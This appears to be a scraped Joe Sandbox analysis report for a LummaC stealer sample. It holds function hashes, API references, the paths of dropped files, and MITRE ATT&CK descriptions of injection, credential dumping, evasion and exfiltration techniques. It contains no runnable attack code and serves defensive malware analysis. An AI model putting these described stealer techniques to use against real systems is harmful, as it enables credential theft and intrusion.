Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccf941e7fe5624e6f4a88a7e0a6bbbd0f64b9a98482754db5993dd3c42157b2
Instruction ID: e81829ceb6de33b0e67936d7f863b9261bd7c88bb4463c7563b3aeec6f58fb23
Opcode Fuzzy Hash: 5ccf941e7fe5624e6f4a88a7e0a6bbbd0f64b9a98482754db5993dd3c42157b2
Instruction Fuzzy Hash: 2D116D6171971406C3249F5DC8A2137F7E5DBDE228F15956BD9C08F680E279C80583D5

Function 0043BC89 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc748946e64d45d657f6eb95c4e34ff63b6a43305146beb66f79757e8bf03b3
Instruction ID: f224e134aec5db1a583a87e69fad4f08041c761aa2885f1ebaa52bdd2a86bb0a
Opcode Fuzzy Hash: 2dc748946e64d45d657f6eb95c4e34ff63b6a43305146beb66f79757e8bf03b3
Instruction Fuzzy Hash: 32213A76D003009FEB018F25FCD261A3AA1EB4531AF089439D801AB32BEB35CA558B89

Function 00405DFE Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfcf36e7a99b4f47ba3dc1aa55800276fdb5364600f0d34ec937f0b378e4f670
Instruction ID: b2ff939d2e8c9b8779982e77ab9d46f43054c55c699fd51ce491d4e0c7c94abd
Opcode Fuzzy Hash: dfcf36e7a99b4f47ba3dc1aa55800276fdb5364600f0d34ec937f0b378e4f670
Instruction Fuzzy Hash: 7121C72520E3C1DEC382C679488044FBF929EFA104F889A9DF5C86B357C160C655C7AB

Function 00435030 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: d4165c8fe00666c1322871d07a4ff29580d145725364d726f28eb893eb7d95cf
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 25112933A055D00EC31A8D3C8450569BFB30A97334F59539AF4B49B3D2D627CD8A83D9

Function 0042A520 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d264c0867d2fa92b8251ffe03589daabf4bdf4353170cc78629a50c1993d7acf
Instruction ID: 86f83a7b4ce01453da1724741ab83bf7953ab006cb33931b4fcdef757ad2ab23
Opcode Fuzzy Hash: d264c0867d2fa92b8251ffe03589daabf4bdf4353170cc78629a50c1993d7acf
Instruction Fuzzy Hash: 4201B9F270031167D7219E26E4C072BB2A89F44708F48443EDC0457342EB7EEC65C69B

Function 00428F22 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa20400040bdf685eaa93ad62cc8f7c4c5a643ae1c07356d919e72541078c8a0
Instruction ID: 48e44c799fcee5eddb1b1ad5686fed3e24a4f6b3baf4ec789d4ed05bb677651c
Opcode Fuzzy Hash: aa20400040bdf685eaa93ad62cc8f7c4c5a643ae1c07356d919e72541078c8a0
Instruction Fuzzy Hash: 4A01FC38A05220CFDB049F51EDC15BE77B2EBA7354F69007EE041AB662DB389C028798

Function 0043E7A0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906e2c9655d603988a0ca16da9d1f5de947345afeac00b100bfaa3faf01e8516
Instruction ID: c4f444b1f0f2ee17610012d4f235c79047570d722bd45f3b04cdbf232faf744b
Opcode Fuzzy Hash: 906e2c9655d603988a0ca16da9d1f5de947345afeac00b100bfaa3faf01e8516
Instruction Fuzzy Hash: 1CE09B7574D7404FD3089B31CC9597B7775EBDB204F19697CD2C2073A2D2659801C759

Function 0042D25E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed083c4ae971fb7239bb1c4f3f4931496c8247ab09b3aed76939e3993ed43b9e
Instruction ID: 8518bd4e64888c286ac27128b58482c6238a3c0c2e2483acfc7e47a3be8e7d3b
Opcode Fuzzy Hash: ed083c4ae971fb7239bb1c4f3f4931496c8247ab09b3aed76939e3993ed43b9e
Instruction Fuzzy Hash: F4F0A75161C7D08EC717477858656FB6FE09B13214F9906EED0939B593D008410AC759

Function 0042748D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b73d714d6e882c1021f51582a6833cedda562f305eb31e0d2d435900827d8e
Instruction ID: ee3b3620ed65c2bb1988853937cd28864c70e9429633ac732fc66f8b6e44f758
Opcode Fuzzy Hash: 74b73d714d6e882c1021f51582a6833cedda562f305eb31e0d2d435900827d8e
Instruction Fuzzy Hash: 52D05E40B0C6B38687061EA864F03326A2A0B1B314F9924BAC5809B252C68FC846552C

Function 0042FFDC Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 104COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042FFE5
VariantInit.OLEAUT32 ref: 0042FFF1

Strings

%, xrefs: 00430085
a, xrefs: 00430051
H, xrefs: 00430061
w, xrefs: 00430079
c, xrefs: 00430029
V, xrefs: 00430041
m, xrefs: 00430069
h, xrefs: 00430071
t, xrefs: 00430039
y, xrefs: 00430011
r, xrefs: 00430019
p, xrefs: 00430021
x, xrefs: 00430031

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: %$H$V$a$c$h$m$p$r$t$w$x$y
API String ID: 2610073882-664009251
Opcode ID: 73d792b329d883abf1363b66454b01ee278a2982f13ef7eae78409da9991579d
Instruction ID: ca1a8beff26b658a5ecb753cf66a9e0a7f54824cd069d245d4ee400b90b606b9
Opcode Fuzzy Hash: 73d792b329d883abf1363b66454b01ee278a2982f13ef7eae78409da9991579d
Instruction Fuzzy Hash: FC5138305087C18EEB16CF28C498356BFE16B66308F08859CC8994F39BC3BAD558C762

Function 0042EEEC Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 102COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042EEFC
VariantInit.OLEAUT32 ref: 0042EF08

Strings

%, xrefs: 0042EFA2
H, xrefs: 0042EF7E
h, xrefs: 0042EF8E
y, xrefs: 0042EF2E
V, xrefs: 0042EF5E
w, xrefs: 0042EF96
m, xrefs: 0042EF86
r, xrefs: 0042EF36
x, xrefs: 0042EF4E
c, xrefs: 0042EF46
a, xrefs: 0042EF6E
t, xrefs: 0042EF56
p, xrefs: 0042EF3E

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: %$H$V$a$c$h$m$p$r$t$w$x$y
API String ID: 2610073882-664009251
Opcode ID: 3df058f0b4f480cb2ef62093bc678e498c69a7190ee5539c98542c4c13c84537
Instruction ID: 817b64cbb6233632f9da03e9996212850a5cdb10170eb546e179ac3f64f9c784
Opcode Fuzzy Hash: 3df058f0b4f480cb2ef62093bc678e498c69a7190ee5539c98542c4c13c84537
Instruction Fuzzy Hash: CE51F8705087C08EEB15CF28C488756BFD16B26308F08859DD8998F39BC2BAD5598762

Function 00432A40 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 126COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00432A82
GetSystemMetrics.USER32 ref: 00432A92

Strings

9C, xrefs: 00432B4A
_7C, xrefs: 00432B81
~0C, xrefs: 00432C7E
:/C, xrefs: 00432BE4
;5C, xrefs: 00432B3F
l8C, xrefs: 00432BAD
w3C, xrefs: 00432C9F
O9C, xrefs: 00432B55

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID: :/C$;5C$O9C$_7C$l8C$w3C$~0C$9C
API String ID: 4116985748-1334324219
Opcode ID: 113e9da9a4b0de8687620a6f9d3e1f2e9aaf1b8e597e0f481a1583de00e107c9
Instruction ID: 74323e0bd0ee9c6d8de6f2d3db388267b6d22c840c033357a16240b4583956b5
Opcode Fuzzy Hash: 113e9da9a4b0de8687620a6f9d3e1f2e9aaf1b8e597e0f481a1583de00e107c9
Instruction Fuzzy Hash: F49113B000E3C18EE770DF15D54878ABBE0AB8630CF118D5EA9D85A245C7B9614DCF8A

Function 0040CDD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00409FB5), ref: 0040CDD6
FreeLibrary.KERNEL32 ref: 0040CDF7

Strings

Wu, xrefs: 0040CDD6, 0040CDF7

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: d8fe8ac9240e60722ba87a2e1448cdd75f19c980080de67df6f0c4a80c096a51
Instruction ID: 001b2c966a946c649569dba94f3b8cfbc47d579e5ca704f9fa965a077fc88517
Opcode Fuzzy Hash: d8fe8ac9240e60722ba87a2e1448cdd75f19c980080de67df6f0c4a80c096a51
Instruction Fuzzy Hash: 3BC002BD882000EFFF412B65FD099183A22BB8A316B094830E41190531DB3209B5EF2B

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EBUdultKh7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EBUdultKh7.exe.log

C:\Users\user\AppData\Local\Temp\RES6F80.tmp

C:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.0.cs

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.out

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
EBUdultKh7.exe

Function 03222805 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 03222810 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 03222581 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 03222588 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 032223E8 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Function 03222670 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 032223F0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 03222678 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 032224C1 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Function 03222339 Relevance: 1.6, APIs: 1, Instructions: 53
threadCOMMON

Function 032224C8 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 03222340 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre